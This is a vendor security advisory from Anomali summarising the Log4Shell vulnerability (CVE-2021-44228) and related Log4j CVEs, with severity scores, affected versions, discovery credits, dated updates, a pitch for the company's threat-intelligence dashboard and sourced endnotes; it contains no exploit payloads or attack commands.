Anomali Threat Research: Apache Log4j 2 Vulnerability

A critical vulnerability, registered as CVE-2021-44228 (Log4Shell), has been identified in Apache Log4j 2, which is an open source Java package used to enable logging.[1] The vulnerability was discovered by Chen Zhaojun of Alibaba in late November 2021, reported to Apache, and subsequently released to the public on December 9, 2021.[2]

The Apache Software Foundation (ASF) rates CVE-2021-44228 as a 10 on the common vulnerability scoring system (CVSS) scale.[3] Log4Shell is a remote code execution (RCE) vulnerability that is exploited via improper deserialization of user input that is sent into the Log4j package framework.[4] Specifically, the vulnerability is located in the JNDI component of the LDAP connector.[5] A threat actor’s objective is to trick JNDI into connecting to an threat actor-controlled directory.[6] However, the exploitation reliability of Log4Shell is dependent on how the package is implemented.

  • Affected versions: log4j version 2.0-beta9 to version 2.14.1
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Not required

Update: December 28, 2021

Overview

Another vulnerability, registered as CVE-2021-44832 was identified by Checkmarx researchers Yaniv Nizry and Liad Levy and released to the public on December 28, 2021.[7] The initial rollout of the vulnerability description by Apache stated that it was an RCE, however, Nizry tweeted that the vulnerability results in arbitrary code execution (ACE).[8] ACE requires previous access to execute code, while RCE does not require previous access or modification but can attack directly. As of this writing, only the Checkmarx blog is referring to CVE-2021-44832 as solely an arbitrary code execution (ACE) vulnerability, which requires an actor to already have permissions to conduct the attack.[9]

CVE-2021-44832
Arbitrary code execution (ACE) / RCE
Severity: Moderate
CVSS score: 6.6
Affected versions: 2.0-alpha7 to 2.17.0, excluding 2.3.2 and 2.12.4
NIST DOP: December 28, 2021

Update: December 22, 2021

Three additional vulnerabilities related to the initial Log4Shell (CVE-2021-44228) vulnerability have been identified as security patches have rolled out, and threat actors familiarized themselves with this new attack vector. These vulnerabilities are:

CVE-2021-45046CVE-2021-4104CVE-2021-45105
RCERCEDenial-of-service
Severity: CriticalSeverity: HighSeverity: High
CVSS score: 9.0CVSS score: 8.1CVSS score: 7.5
Affected versions: 2.0-beta9 to 2.15.0, excluding 2.12.2Log4j 1.2Affected versions: 2.0-beta9 to 2.16.0, excluding 2.12.3
NIST DOP: December 14, 2021NIST DOP: December 14, 2021NIST DOP: December 18, 2021

​​How Anomali Can Help

Update: December 22, 2021

The Anomali Threat Research team has updated the previously-released ThreatStream dashboard “Log4Shell (CVE-2021-44228)” to include Log4j vulnerabilities. The updated dashboard title is Log4Shell (CVE-2021-44228) and Variants: CVE-2021-45046, CVE-2021-45105, CVE-2021-4104, and CVE-2021-44832.” The dashboard can be used for tracking associated indicators, research articles and vulnerable products. Customers can use Anomali Integrator to block specific IOCs in their downstream security integrations.


Anomali Match can provide alerting and retrospective lookup capabilities to detect and contextualize matches for these indicators.

Anomali Log4Shell Dashboard

For more information, reach out to your Customer Success Manager.

Endnotes

[1] “CVE-2021-44228 Detail,” NVD NIST, access December 13, 2021, published December 10, 2021https://nvd.nist.gov/vuln/detail/CVE-2021-44228; Free Wortley, et al., “Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package,” LunaSec, accessed December 13, 2021, published December 12, 2021, https://www.lunasec.io/docs/blog/log4j-zero-day/.

[2] Dan Goodin, "Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet," Ars Technica, accessed December 28, 2021, published December 9, 2021, https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/; Jake King and Samir Bousseaden, “Detecting Exploitation of CVE-2021-44228 (log4j2) with Elastic Security,” Elastic NV, accessed December 13, published December 10, 2021, https://www.elastic.co/blog/detecting-log4j2-with-elastic-security.

[3] “CVE-2021-44228 Detail,” NVD NIST.

[4] Jake King and Samir Bousseaden, “Detecting Exploitation of CVE-2021-44228 (log4j2) with Elastic Security,” Elastic NV.

[5] “Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild,” Cisco Talos Blog, accessed December 13, 2021, published December 10, 2021, https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html.

[6] Hans-Martin Münch, “VULNERABILITY NOTES: LOG4SHELL,” Mogwai Labs, accessed December 13, 2021, published, December 10, 2021, https://mogwailabs.de/en/blog/2021/12/vulnerability-notes-log4shell/?s=09.

[7] Yaniv Nizry, “Stay tuned for a blog post…,” Twitter, accessed December 28 2021, published December 28, 2021, https://twitter.com/YNizry/status/1475916671953117184; “Apache Log4j Security Vulnerabilities,” Apache, accessed December 22, 2021, published December 17, 2021, https://logging.apache.org/log4j/2.x/security.html.

[8] Yaniv Nizry, “Stay tuned for a blog post…,” Twitter.

[9] Yaniv Nizry and Liad Levy, “CVE-2021-44832 - APACHE LOG4J 2.17.0 ARBITRARY CODE EXECUTION VIA JDCAPPENDER DATASOURCE ELEMENT,” Checkmarx Blog, accessed December 28, 2021, published December 28, 2021, https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/.

Topics:

Research

Related Content

Get the Anomali Newsletter

The latest Anomali updates and cybersecurity news, delivered straight to your inbox each month.